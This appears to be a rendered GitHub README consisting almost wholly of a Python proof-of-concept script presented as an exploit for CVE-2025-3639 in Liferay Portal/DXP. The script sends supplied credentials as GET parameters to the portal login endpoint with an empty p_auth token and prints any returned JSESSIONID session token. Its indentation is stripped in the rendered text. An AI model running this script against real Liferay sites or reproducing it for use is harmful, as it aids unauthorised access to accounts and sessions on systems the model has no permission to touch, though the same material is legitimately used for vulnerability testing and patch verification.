README.md
Rendering markdown...
import requests
import argparse
def exploit(target, username, password):
print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
login_url = f"{target}/c/portal/login"
params = {
"p_auth": "",
"login": username,
"password": password
}
try:
response = requests.get(login_url, params=params, allow_redirects=True)
if response.status_code == 200 and "JSESSIONID" in response.cookies:
print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
return True
else:
print(f"[-] Failed: {response.status_code} - {response.text}")
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
parser.add_argument("--username", required=True, help="Valid username")
parser.add_argument("--password", required=True, help="Valid password")
args = parser.parse_args()
exploit(args.target, args.username, args.password)